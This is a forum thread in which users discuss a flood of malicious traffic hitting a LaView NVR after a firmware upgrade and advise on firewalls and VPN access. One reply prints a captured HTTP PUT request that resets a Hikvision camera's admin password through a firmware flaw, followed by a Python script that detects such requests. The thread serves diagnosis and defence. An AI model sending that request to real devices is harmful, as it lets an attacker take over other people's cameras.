LaView FW Security Flaw (LV-N9808C8E)

JonDC

n3wb
Joined
Sep 1, 2021
Messages
10
Reaction score
0
Location
USA
Has anyone experienced a massive upswing in malicious IPs when upgrading to v3.4.62? I had been on v3.3.1 for the past few years without any security issues. Upgraded two days ago from their official FW site, then hit with a barrage of malicious IPs pretty much across the globe (RUS, UKR, GER, ROM, USA, DEN, SWE) starting at midnight and running for 9 hours, then repeating again today. Can’t downgrade after talking with LaView, they won’t patch any existing security flaws in v3.4.62, and won’t release v3.4.93 or higher. Thoughts?
 

alastairstevenson

Staff member
Joined
Oct 28, 2014
Messages
15,930
Reaction score
6,778
Location
Scotland
Has anyone experienced a massive upswing in malicious IPs when upgrading to v3.4.62?
An off-the-wall idea that's most likely wrong (but stranger things have happened):
Maybe there is an as-yet undisclosed and unpatched security vulnerability in that version of firmware where the catalogued population using that version is being specifically targeted with an attempted exploit.
I've seen that behaviour with specific Hikvision vulnerabilities.

Do you have the ability to capture the network traffic against the device, to see if the nature of some of the access attempts goes beyond the usual basic probe?
This would need something like a switch with a facility such as port replication to sniff the traffic.
 

alastairstevenson

Staff member
Joined
Oct 28, 2014
Messages
15,930
Reaction score
6,778
Location
Scotland
version of firmware where the catalogued population using that version is being specifically targeted with an attempted exploit.
Here is an example of an exposed Hikvision IP camera being hacked by the use of a serious firmware vulnerability.
In this case, it was just the admin password that was changed, as opposed to the device being bricked.
Code:
1656    2937.222673853    47.214.172.52    192.168.1.90    HTTP/XML    339    PUT /Security/users/1?auth=YWRtaW46MTEK HTTP/1.1

PUT /Security/users/1?auth=YWRtaW46MTEK HTTP/1.1
Content-Type: application/xml
Content-Length: 141
Host: xxx.180.45.xxx
Connection: close

<User version="1.0" xmlns="http://www.hikvision.com/ver10/XMLSchema"><id>1</id><userName>admin</userName><password>asdf1234</password></User>
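As an added example (not code from this thread, LaView or Hikvision), here is a small Python detector for the pattern in the capture above: it walks constructed request-log lines of the form "src dst METHOD target HTTP/1.x" and flags writes to the /Security/users path that come from outside an assumed LAN of 192.168.1.0/24 or carry an auth= token in the URL, decoding that token only as far as the username so the alert names the account being changed.

```python
import base64
import ipaddress
import re
from typing import List, Optional, Tuple

# Constructed sample log (not from the thread's capture): "src dst METHOD target HTTP/1.x".
SAMPLE_LOG = """\
203.0.113.7 192.168.1.90 PUT /Security/users/1?auth=YWRtaW46MTEK HTTP/1.1
192.168.1.20 192.168.1.90 GET /ISAPI/Streaming/channels/101/picture HTTP/1.1
192.168.1.20 192.168.1.90 PUT /Security/users/1 HTTP/1.1
198.51.100.9 192.168.1.90 PUT /Security/users/1?auth=YWRtaW46MTEK HTTP/1.1
"""

LAN = ipaddress.ip_network("192.168.1.0/24")  # assumed local subnet; adjust to yours
REQ_RE = re.compile(r"^(\S+) (\S+) ([A-Z]+) (\S+) HTTP/1\.[01]$")
USERS_PATH = re.compile(r"^/Security/users(?:/\d+)?$")  # account path seen in the capture
WRITE_METHODS = {"PUT", "POST", "DELETE"}

# (src_ip, path, src_is_on_lan, username_from_url_auth_token_or_None)
Alert = Tuple[str, str, bool, Optional[str]]

def decode_url_auth(query: str) -> Optional[str]:
    # auth=<base64 "user:pass"> in the URL is the tell; normal clients use headers.
    m = re.search(r"(?:^|&)auth=([A-Za-z0-9+/=]+)", query)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return raw.split(":", 1)[0].strip() or None

def scan(log: str) -> List[Alert]:
    alerts: List[Alert] = []
    for line in log.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip
        src, _dst, method, target = m.groups()
        path, _, query = target.partition("?")
        if method in WRITE_METHODS and USERS_PATH.match(path):
            on_lan = ipaddress.ip_address(src) in LAN
            alerts.append((src, path, on_lan, decode_url_auth(query)))
    return alerts

def suspicious(alerts: List[Alert]) -> List[Alert]:
    # Account writes from outside the LAN, or carrying credentials in the URL, need a look.
    return [a for a in alerts if not a[2] or a[3] is not None]
```

Feed it lines exported from a port-mirror capture (or a reverse proxy in front of the device) and any non-empty result from suspicious() is worth investigating.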
 

mikeynags

Known around here
Joined
Mar 14, 2017
Messages
1,034
Reaction score
939
Location
CT
Has anyone experienced a massive upswing in malicious IPs when upgrading to v3.4.62? I had been on v3.3.1 for the past few years without any security issues. Upgraded two days ago from their official FW site, then hit with a barrage of malicious IPs pretty much across the globe (RUS, UKR, GER, ROM, USA, DEN, SWE) starting at midnight and running for 9 hours, then repeating again today. Can’t downgrade after talking with LaView, they won’t patch any existing security flaws in v3.4.62, and won’t release v3.4.93 or higher. Thoughts?
What type of firewall is this thing behind? Or do you have it directly connected to the Internet?
 

alastairstevenson

Staff member
Joined
Oct 28, 2014
Messages
15,930
Reaction score
6,778
Location
Scotland
What type of firewall is this thing behind?
A Google search suggests it's an Xfinity device.
Presumably it's not just commenting on what's hitting the gateway itself - that's practically continuous.
There may well be port forwarding configured to the device the logs are referencing.

 

iwanttosee

Pulling my weight
Joined
Dec 27, 2020
Messages
203
Reaction score
186
Location
US
Has anyone experienced a massive upswing in malicious IPs when upgrading to v3.4.62? I had been on v3.3.1 for the past few years without any security issues. Upgraded two days ago from their official FW site, then hit with a barrage of malicious IPs pretty much across the globe (RUS, UKR, GER, ROM, USA, DEN, SWE) starting at midnight and running for 9 hours, then repeating again today. Can’t downgrade after talking with LaView, they won’t patch any existing security flaws in v3.4.62, and won’t release v3.4.93 or higher. Thoughts?
Cut off internet access to the NVR and Cameras. If you need to access it remotely, use OpenVPN.
 